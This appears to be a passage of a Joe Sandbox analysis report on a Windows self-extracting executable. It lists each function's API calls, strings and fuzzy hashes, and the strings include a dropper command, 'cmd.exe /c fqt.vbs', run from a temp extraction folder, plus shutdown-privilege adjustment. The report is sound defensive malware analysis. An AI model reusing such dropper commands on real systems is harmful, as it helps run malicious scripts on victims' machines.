                                                                      • String ID:
                                                                      • API String ID: 122130370-0
                                                                      • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                      • Instruction ID: 1d97c368adc4d5362bb76392b3231c7a27d7fefc1a07aad54a3c7800c9490357
                                                                      • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                      • Instruction Fuzzy Hash: 4F018451D0CAC98AF7116B15AC4036EFA90A745BE0FDC9271DBA90A7D5CB2CF4438B54
                                                                      Function 00007FF7D6FD5770 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                      • Instruction ID: cd1f390d8251e568802da9316fac31ede59dfb8fa06b85a9a691861e47002ae8
                                                                      • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                      • Instruction Fuzzy Hash: E1F03C31A08B85D2D71C5F65F94117D7660EB44B58FD8823ADB1B475C4CF78E485CB10

                                                                      Non-executed Functions

                                                                      Function 00007FF7D6FD3530 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 174windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                      • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$cmd.exe /c fqt.vbs
                                                                      • API String ID: 3530494346-1703193554
                                                                      • Opcode ID: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
                                                                      • Instruction ID: 020517db26e033d4150c2d3142c85f96a8cc880e8f9f1b67934fb45a005c7040
                                                                      • Opcode Fuzzy Hash: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
                                                                      • Instruction Fuzzy Hash: 14714462E0CE4A86F750AB559C047BFE691AB96785FDC4132CB5D02695CF3CB5068F20
                                                                      Function 00007FF7D6FD11CC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68librarymemoryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                      • API String ID: 4204503880-1888249752
                                                                      • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                      • Instruction ID: df0e903a25c421136ba9615502f7f897042aa20c5c13e3f3894749f5c78eb3e7
                                                                      • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                      • Instruction Fuzzy Hash: 53310936A08B498AD6109F56F8442AEBBA0FB89B81F89512ADF4D43714DF3CE006CF50
                                                                      Function 00007FF7D6FD1C0C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2829607268-3733053543
                                                                      • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                      • Instruction ID: 00ad5d46c3410f5c714f65b596341d229a45f722b155b3561ae183e2d10a0800
                                                                      • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                      • Instruction Fuzzy Hash: BE21A072E18A4686E7509B60E8453BFFB61FB99745FC89136D74E02A54CF3CE0068F10
                                                                      Function 00007FF7D6FD8964 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 4104442557-0
                                                                      • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                      • Instruction ID: 21ca693fa97f57ff47270899e84745ff67fa2a8c4f6cc538e24a902bd0742ee3
                                                                      • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                      • Instruction Fuzzy Hash: 41115122A04F458AEB00EF61EC442A973A4FB19758FC81A31EB6D87754DF7CE1658750
                                                                      Function 00007FF7D6FD8790 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                      • Instruction ID: 73c6046a9e059a910c999a414bb8e7e956f3af44ecf47747cdb71dab0675a396
                                                                      • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                      • Instruction Fuzzy Hash: F4B09210F65806D1D704BB619C8506A53A0BB68304FC80872C21D80120DE1CA19B8B10
                                                                      Function 00007FF7D6FD70A8 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                      • String ID: "$:$@$RegServer
                                                                      • API String ID: 1203814774-4077547207
                                                                      • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                      • Instruction ID: ccbb2a33d5688e03d6b6486345c9448f02ab815caf736bed644ee402a05423ab
                                                                      • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                      • Instruction Fuzzy Hash: 9402A251E0CE8A45EA61AB185C1427FEBA1AF46744FDC0137DBDD0A695DE2DF4078F20
                                                                      Function 00007FF7D6FD4A60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4A86
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4AAA
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4ACA
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4AEC
                                                                      • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4B1B
                                                                      • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4B3A
                                                                      • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4B54
                                                                      • FreeLibrary.KERNEL32 ref: 00007FF7D6FD4BF1
                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4C0D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                      • API String ID: 1865808269-1731843650
                                                                      • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                      • Instruction ID: dbfa9e076c201dac537518cbb21b26cfbce74d907c31c6601d2a9a40f8a985df
                                                                      • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                      • Instruction Fuzzy Hash: 15516F21E09E4A86E641AB11AC5027FBA91FB5AB81FC84136DF4E03794DF3CF44ACB10
                                                                      Function 00007FF7D6FD4DCC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159memorywindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                      • String ID: cmd.exe /c fqt.vbs$rce.
                                                                      • API String ID: 2929476258-2284415721
                                                                      • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                      • Instruction ID: f37603a900f2db6cd8789f68ed5539aa446d1e0f2f3e548bcc8396b900939446
                                                                      • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                      • Instruction Fuzzy Hash: 65619521E08B8986EA11AB65AC003BEEB90AB59794FC85232DF5D07795DF3CF5478B10
                                                                      Function 00007FF7D6FD261C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                      • API String ID: 2659952014-2428544900
                                                                      • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                      • Instruction ID: 22d54ac6665c7389cb7399974d963c5c65ef5abd615b12ddb73a953e6a7f0489
                                                                      • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                      • Instruction Fuzzy Hash: 12517372A08A8596EB10DB14EC542BEB7A0FB86B90FD85132DB4E03754DF3CE446CB50
                                                                      Function 00007FF7D6FD33F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                      • String ID: cmd.exe /c fqt.vbs
                                                                      • API String ID: 3785188418-3590164600
                                                                      • Opcode ID: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                                      • Instruction ID: 601f6a8b6985e9d4ce43548106a4b14215cf0509565cb9d40eaea7679c429357
                                                                      • Opcode Fuzzy Hash: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                                      • Instruction Fuzzy Hash: 8F310435D08E4A86E6116B54AC043BEEA91FB9BB51FCC9332CB1E02394CF3DB046CA10
                                                                      Function 00007FF7D6FD12EC Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                      • String ID:
                                                                      • API String ID: 2168512254-0
                                                                      • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                      • Instruction ID: d0b10da01ee1cc71e5ff41e3ad18ddaab2fa203f79d19588eb863eb2efb49734
                                                                      • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                      • Instruction Fuzzy Hash: C4513D32A04A45CAE710AF21E8442AEBBA4FB5EB88FC95136DB0E53754DF38E445CB10
                                                                      Function 00007FF7D6FD7F04 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                      • API String ID: 3346862599-1109908249
                                                                      • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                      • Instruction ID: 13cef9b21e9f0f27a706f649b86d9371e1b13ec8b38b2c8f74306f296ab1c41a
                                                                      • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                      • Instruction Fuzzy Hash: 74516E32E09A858AEB10AB20984426EB7A5F788B94FCD5532DB6D03794DF3CF446CB10
                                                                      Function 00007FF7D6FD2834 Relevance: 12.2, APIs: 8, Instructions: 153memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                      • String ID:
                                                                      • API String ID: 1051330783-0
                                                                      • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                      • Instruction ID: 56ed3dbcb23338ca705a21a76eb8cd94011ac920a9d83a6da0c879ed0057e6e5
                                                                      • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                      • Instruction Fuzzy Hash: 4A514132E04A468AEA10EF559C006BEB7A4FB48B95FD85132DF0963794DF39F4428B61
                                                                      Function 00007FF7D6FD2A6C Relevance: 12.1, APIs: 8, Instructions: 126COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                      • String ID:
                                                                      • API String ID: 975904313-0
                                                                      • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                      • Instruction ID: f11dd5bb2c6a4936a6bd04b7e4f89dda37d157faa93d58251d93a7c1f872e860
                                                                      • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                      • Instruction Fuzzy Hash: 11517551E08A8945FB21AF1598043BEEA91AB49B95FCC4172CB5E07785CE7CF4478B60
                                                                      Function 00007FF7D6FD3F74 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5078
                                                                        • Part of subcall function 00007FF7D6FD5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5089
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50AF
                                                                        • Part of subcall function 00007FF7D6FD5050: LoadResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50C0
                                                                        • Part of subcall function 00007FF7D6FD5050: LockResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50CF
                                                                        • Part of subcall function 00007FF7D6FD5050: memcpy_s.MSVCRT ref: 00007FF7D6FD50EE
                                                                        • Part of subcall function 00007FF7D6FD5050: FreeResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50FD
                                                                      • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF7D6FD3139), ref: 00007FF7D6FD3F95
                                                                      • LocalFree.KERNEL32 ref: 00007FF7D6FD4018
                                                                        • Part of subcall function 00007FF7D6FD4DCC: LoadStringA.USER32 ref: 00007FF7D6FD4E60
                                                                        • Part of subcall function 00007FF7D6FD4DCC: MessageBoxA.USER32 ref: 00007FF7D6FD4EA0
                                                                        • Part of subcall function 00007FF7D6FD7700: GetLastError.KERNEL32 ref: 00007FF7D6FD7704
                                                                      • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF7D6FD3139), ref: 00007FF7D6FD403E
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00007FF7D6FD3139), ref: 00007FF7D6FD409F
                                                                        • Part of subcall function 00007FF7D6FD7AC8: FindResourceA.KERNEL32 ref: 00007FF7D6FD7AF2
                                                                        • Part of subcall function 00007FF7D6FD7AC8: LoadResource.KERNEL32 ref: 00007FF7D6FD7B09
                                                                        • Part of subcall function 00007FF7D6FD7AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF7D6FD7B3F
                                                                        • Part of subcall function 00007FF7D6FD7AC8: FreeResource.KERNEL32 ref: 00007FF7D6FD7B51
                                                                      • LocalFree.KERNEL32 ref: 00007FF7D6FD4078
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
